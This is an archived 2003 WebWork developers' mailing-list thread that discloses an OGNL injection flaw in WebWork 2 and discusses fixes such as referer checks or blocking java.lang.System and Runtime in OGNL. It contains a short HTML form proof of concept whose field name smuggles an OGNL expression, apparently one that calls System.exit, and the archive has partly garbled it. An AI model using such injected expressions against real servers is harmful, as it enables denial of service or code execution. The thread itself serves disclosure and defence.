Re: [OS-webwork] Security flaw with WW2

Fri, 12 Dec 2003 08:02:50 -0800 

Disallowing POSTs with unknown referrers doesn't work at all.  You can forge
the Referer header easily.

Blake

----- Original Message ----- 
From: "Carlos Villela" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, December 12, 2003 8:32 AM
Subject: RES: [OS-webwork] Security flaw with WW2


OOOOOOUCH!

Ok, possible solutions:

- Disallow POSTs with unknown referers (sucks, but works)
- Disallow use of java.lang.System, java.lang.Runtime and friends in OGNL
(good & works)

Good catch, John!

-cv

-----Mensagem original-----
De: John Patterson [mailto:[EMAIL PROTECTED]
Enviada em: sexta-feira, 12 de dezembro de 2003 11:24
Para: Webwork
Assunto: [OS-webwork] Security flaw with WW2


Guess what this does?

<html>
<body>
<form method="post" action=http://myhost/app/myAction.action>
<input name="@[EMAIL PROTECTED](1).dummy" value=""/>
</form>
</body>
</html>

John.


-------------------------------------------------------
This SF.net email is sponsored by: SF.net Giveback Program.
Does SourceForge.net help you be more productive?  Does it
help you create better code?  SHARE THE LOVE, and help us help
YOU!  Click Here: http://sourceforge.net/donate/
_______________________________________________
Opensymphony-webwork mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/opensymphony-webwork


-------------------------------------------------------
This SF.net email is sponsored by: SF.net Giveback Program.
Does SourceForge.net help you be more productive?  Does it
help you create better code?  SHARE THE LOVE, and help us help
YOU!  Click Here: http://sourceforge.net/donate/
_______________________________________________
Opensymphony-webwork mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/opensymphony-webwork





-------------------------------------------------------
This SF.net email is sponsored by: SF.net Giveback Program.
Does SourceForge.net help you be more productive?  Does it
help you create better code?  SHARE THE LOVE, and help us help
YOU!  Click Here: http://sourceforge.net/donate/
_______________________________________________
Opensymphony-webwork mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/opensymphony-webwork

Reply via email to